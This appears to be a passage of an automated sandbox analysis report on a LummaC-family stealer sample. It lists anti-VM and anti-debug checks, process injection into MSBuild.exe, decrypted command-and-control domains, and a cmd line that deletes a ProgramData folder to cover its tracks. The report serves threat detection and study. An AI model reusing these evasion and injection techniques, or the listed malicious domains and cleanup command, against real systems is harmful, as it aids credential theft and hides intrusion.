Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware-
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: MSBuild.exe, 0000000B.00000002.2205846539.0000000001196000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW#
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: MSBuild.exe, 00000003.00000002.2175828757.0000000000E08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.6.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.6.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort	Jump to behavior

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Code function: 0_2_008F7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_008F7922

Contains functionality to dynamically determine API calls

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_00418A63

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F2003 mov edi, dword ptr fs:[00000030h]	0_2_008F2003
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0091E385 mov eax, dword ptr fs:[00000030h]	0_2_0091E385
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0091E37A mov eax, dword ptr fs:[00000030h]	0_2_0091E37A
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0091E362 mov eax, dword ptr fs:[00000030h]	0_2_0091E362
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00935582 mov eax, dword ptr fs:[00000030h]	0_2_00935582
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_0090A64C mov eax, dword ptr fs:[00000030h]	0_2_0090A64C
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_00900F2E mov ecx, dword ptr fs:[00000030h]	0_2_00900F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004014AD mov eax, dword ptr fs:[00000030h]	3_2_004014AD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0040148A mov eax, dword ptr fs:[00000030h]	3_2_0040148A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004014A2 mov eax, dword ptr fs:[00000030h]	3_2_004014A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004186A9 mov eax, dword ptr fs:[00000030h]	3_2_004186A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004186AA mov eax, dword ptr fs:[00000030h]	3_2_004186AA
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D02003 mov edi, dword ptr fs:[00000030h]	10_2_00D02003
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D1A64C mov eax, dword ptr fs:[00000030h]	10_2_00D1A64C
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D10F2E mov ecx, dword ptr fs:[00000030h]	10_2_00D10F2E

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Code function: 0_2_0090CC4B GetProcessHeap,

0_2_0090CC4B

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F7610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_008F7610
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F7922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008F7922
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008F7AAF SetUnhandledExceptionFilter,	0_2_008F7AAF
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: 0_2_008FDA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_008FDA73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041D12A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0041D12A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041DAAC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0041DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0042774E SetUnhandledExceptionFilter,	3_2_0042774E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBDB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_6CBDB66C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CBDB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CBDB1F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_6CD8AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_6CD8AC62
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D07610 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00D07610
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D07922 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00D07922
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D07AAF SetUnhandledExceptionFilter,	10_2_00D07AAF
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: 10_2_00D0DA73 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00D0DA73

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: f1r6P3j3g7.exe PID: 6532, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 6628, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write			Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

3_2_0040F54A

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A			Jump to behavior

LummaC encrypted strings found

Source: KEGIDHJKKJ.exe	String found in binary or memory: frizzettei.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: isoplethui.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: exemplarou.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: invinjurhey.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: wickedneatr.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: exilepolsiy.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: laddyirekyi.sbs
Source: KEGIDHJKKJ.exe	String found in binary or memory: bemuzzeki.sbs

Searches for specific processes (likely to inject)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_004124A8 __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_004124A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 3_2_0041257F __EH_prolog3_catch_GS,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		3_2_0041257F

Writes to foreign memory regions

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 430000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 43D000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 670000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 671000	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 894008	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44B000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 44E000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 45E000	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: D09008	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\ProgramData\KEGIDHJKKJ.exe "C:\ProgramData\KEGIDHJKKJ.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGIJDGCAEBFI" & exit	Jump to behavior
Source: C:\ProgramData\KEGIDHJKKJ.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

Code function: 0_2_0091E013 cpuid

0_2_0091E013

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	0_2_0090C085
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,	0_2_0090622B
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,	0_2_009423DB
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: EnumSystemLocalesW,	0_2_0090C327
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: EnumSystemLocalesW,	0_2_0090C372
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0090C498
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: EnumSystemLocalesW,	0_2_0090C40D
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	0_2_0094456E
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,	0_2_0090C6EB
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0090C814
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0090C9E9
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: GetLocaleInfoW,	0_2_0090C91A
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,	0_2_00946A48
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,	0_2_00947B38
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	0_2_00945DBC
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: EnumSystemLocalesW,	0_2_00905D7F
Source: C:\Users\user\Desktop\f1r6P3j3g7.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,	0_2_00946D66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	3_2_00410DDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0042B1EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	3_2_0042B2E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	3_2_0042B3E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	3_2_0042B388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	3_2_0042AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	3_2_00425503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	3_2_0042B5B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	3_2_004275BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: EnumSystemLocalesA,	3_2_0042B676
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	3_2_00428EE4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	3_2_00429E8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,_LocaleUpdate::_LocaleUpdate,___ascii_strnicmp,__tolower_l,__tolower_l,	3_2_0042E68F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00427696
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B6A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	3_2_0042B743
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	3_2_0042B707
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: GetLocaleInfoA,	3_2_0042E7C4
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	10_2_00D1C085
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,	10_2_00D1622B
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: EnumSystemLocalesW,	10_2_00D1C372
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: EnumSystemLocalesW,	10_2_00D1C327
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_2_00D1C498
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: EnumSystemLocalesW,	10_2_00D1C40D
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,	10_2_00D1C6EB
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_00D1C814
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	10_2_00D1C9E9
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: GetLocaleInfoW,	10_2_00D1C91A
Source: C:\ProgramData\KEGIDHJKKJ.exe	Code function: EnumSystemLocalesW,	10_2_00D15D7F

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\f1r6P3j3g7.exe

